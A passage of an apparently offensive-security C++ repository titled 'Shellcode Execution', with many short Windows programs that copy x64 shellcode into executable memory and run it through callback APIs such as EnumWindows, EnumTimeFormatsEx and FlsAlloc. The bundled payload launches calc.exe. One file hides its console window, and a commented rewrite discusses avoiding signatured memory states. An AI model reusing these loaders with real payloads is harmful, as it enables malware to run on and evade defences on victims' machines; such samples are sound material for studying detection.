"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | 
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | 27 | 28 | int main() { 29 | 30 | 31 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 32 | ::RtlMoveMemory(addr, op, sizeof(op)); 33 | EnumThreadWindows(0, (WNDENUMPROC)addr, NULL); 34 | 35 | return 0; 36 | 37 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumThreadWindows/EnumThreadWindows.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 
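// /Shellcode Execution/EnumTimeFormatsEx/EnumTimeFormatsEx.cpp
//
// Shellcode execution through a callback-taking Win32 API: the payload is
// copied into executable memory and handed to EnumTimeFormatsEx() as its
// TIMEFMT_ENUMPROCEX, so the first enumeration callback transfers control to
// it.  Demo/lab code, same pattern as the sibling Enum* samples in this tree.
#include <windows.h>
#include <stdio.h>
#include <string.h>

// Carried over from the CertEnum* template; nothing in this file calls into
// crypt32, so the link dependency is unused (kept only to match the siblings).
#pragma comment(lib, "Crypt32.lib")

// alfarom256 calc shellcode (64-bit; REX.W-prefixed from the first bytes).
// Runtime bytes: reproduced byte-for-byte from the original.
unsigned char op[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";

// Report a failed Win32 call together with GetLastError(); returns the
// process exit code (1), mirroring the err() helper used by sibling samples.
static int err(const char* what) {
    // DWORD is unsigned long, so %lu (the siblings' %u is a type mismatch).
    printf("Error: %s (%lu)\n", what, ::GetLastError());
    return 1;
}

int main() {
    // Allocate read/write only and flip to execute-read once the bytes are in
    // place (W^X).  The original asked for PAGE_EXECUTE_READWRITE up front,
    // which is neither needed by this payload nor a good habit: a private RWX
    // region is the most widely signatured memory state for this technique.
    LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (address == NULL) {
        // The original dereferenced a NULL result in memcpy on allocation failure.
        return err("VirtualAlloc");
    }

    memcpy(address, op, sizeof(op));

    // The payload only reads its own bytes (the "calc.exe" string at its tail),
    // so PAGE_EXECUTE_READ suffices.  A self-modifying payload substituted here
    // would need PAGE_EXECUTE_READWRITE (or a separate RW scratch area) instead.
    DWORD oldProtect = 0;
    if (!::VirtualProtect(address, sizeof(op), PAGE_EXECUTE_READ, &oldProtect)) {
        ::VirtualFree(address, 0, MEM_RELEASE);
        return err("VirtualProtect");
    }
    // No-op on x86/x64 in practice, required on weakly ordered targets after
    // writing code; cheap enough to keep unconditionally.
    ::FlushInstructionCache(::GetCurrentProcess(), address, sizeof(op));

    // EnumTimeFormatsEx calls the callback once per time format of the locale;
    // the first invocation runs the payload.  Check the BOOL so a failure that
    // happens before any callback (bad locale/flags) is not silent.
    if (!::EnumTimeFormatsEx((TIMEFMT_ENUMPROCEX)address, LOCALE_NAME_SYSTEM_DEFAULT, TIME_NOSECONDS, NULL)) {
        err("EnumTimeFormatsEx");
    }

    // Only reached if the payload returns control to the enumerator; the
    // bundled payload is not expected to (its tail is an exit call), so this
    // is correctness for other payloads rather than the normal path.
    ::VirtualFree(address, 0, MEM_RELEASE);
    return 0;
}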
-------------------------------------------------------------------------------- /Shellcode Execution/EnumTimeFormatsEx/EnumTimeFormatsEx.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumUILanguagesW/EnumUILanguagesW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | 
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | 27 | 28 | 29 | int main() { 30 | 31 | 32 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 33 | memcpy(address, &op[0], sizeof(op)); 34 | 35 | ::EnumUILanguagesW((UILANGUAGE_ENUMPROCW)address, MUI_LANGUAGE_ID, NULL); 36 | return 0; 37 | 38 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumUILanguagesW/EnumUILanguagesW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumWindowStationsW/EnumWindowStationsW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | 6 | // alfarom256 calc shellcode 7 | unsigned char op[] = 8 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 9 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 10 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 11 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 12 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 13 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 14 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 15 | 
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 16 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 17 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 18 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 19 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 20 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 21 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 22 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 23 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 24 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 25 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 26 | "\x63\x2e\x65\x78\x65\x00"; 27 | 28 | 29 | 30 | int main() { 31 | 32 | 33 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 34 | ::RtlMoveMemory(addr, op, sizeof(op)); 35 | 36 | if (addr) { 37 | 38 | ::EnumWindowStationsW((WINSTAENUMPROCW)addr, NULL); 39 | 40 | } 41 | 42 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumWindowStationsW/EnumWindowStationsW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumWindows/EnumWindows.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | int err(const char* errmsg) { 6 | 7 | 8 
| printf("Error: %s (%u)\n", errmsg, ::GetLastError()); 9 | return 1; 10 | 11 | } 12 | 13 | // alfarom256 calc shellcode 14 | unsigned char op[] = 15 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 16 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 17 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 18 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 19 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 20 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 21 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 22 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 23 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 24 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 25 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 26 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 27 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 28 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 29 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 30 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 31 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 32 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 33 | "\x63\x2e\x65\x78\x65\x00"; 34 | 35 | 36 | 37 | int main() { 38 | 39 | 40 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 41 | ::RtlMoveMemory(addr, op, sizeof(op)); 42 | 43 | 44 | ::EnumWindows((WNDENUMPROC)addr, NULL); 45 | 46 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumWindows/EnumWindows.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 
| {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumerateLoadedModules/EnumerateLoadedModules.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // Requires dbghelp.lib 6 | 7 | // alfarom256 calc shellcode 8 | unsigned char op[] = 9 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 10 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 11 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 12 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 13 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 14 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 15 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 16 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 17 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 18 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 19 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 20 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 21 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 22 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 23 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 24 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 25 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 26 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 27 | "\x63\x2e\x65\x78\x65\x00"; 28 | 29 | 30 | 31 | int main() { 32 | 33 | 34 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), 
MEM_COMMIT, PAGE_EXECUTE_READWRITE); 35 | ::RtlMoveMemory(addr, op, sizeof(op)); 36 | ::EnumerateLoadedModules(::GetCurrentProcess(), (PENUMLOADED_MODULES_CALLBACK)addr, NULL); 37 | 38 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumerateLoadedModules/EnumerateLoadedModules.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/FiberContextEdit/FiberContextEdit.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/FileMap/directPointerToFileMap.cpp: -------------------------------------------------------------------------------- 1 | //Video URL: https://youtu.be/WYf_nPIPC4s 2 | #include 3 | #include 4 | 5 | unsigned char buf[] = ""; 6 | 7 | int main() 8 | { 9 | ShowWindow(GetConsoleWindow(), SW_HIDE); 10 | 11 | HANDLE mem_handle = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, 
sizeof(buf), NULL); 12 | 13 | void* mem_map = MapViewOfFile(mem_handle, FILE_MAP_ALL_ACCESS | FILE_MAP_EXECUTE, 0x0, 0x0, sizeof(buf)); 14 | 15 | std::memcpy(mem_map, buf, sizeof(buf)); 16 | 17 | std::cout << ((int(*)())mem_map)() << std::endl; 18 | } 19 | -------------------------------------------------------------------------------- /Shellcode Execution/FlsAlloc/FlsAlloc.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | int main() { 27 | 28 | HANDLE hProcess = ::GetCurrentProcess(); 29 | 30 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 31 | 
memcpy(address, &op[0], sizeof(op)); 32 | 33 | DWORD dIndex = ::FlsAlloc((PFLS_CALLBACK_FUNCTION)address); 34 | CONST CHAR* dummy = "dummy"; 35 | 36 | FlsSetValue(dIndex, &dummy); 37 | 38 | } -------------------------------------------------------------------------------- /Shellcode Execution/FlsAlloc/FlsAlloc.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/ImageGetDigestStream/ImageGetDigestStream.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // Requires Imagehlp.lib 6 | 7 | // alfarom256 calc shellcode 8 | unsigned char op[] = 9 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 10 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 11 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 12 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 13 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 14 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 15 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 16 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 17 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 18 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 19 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 20 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 
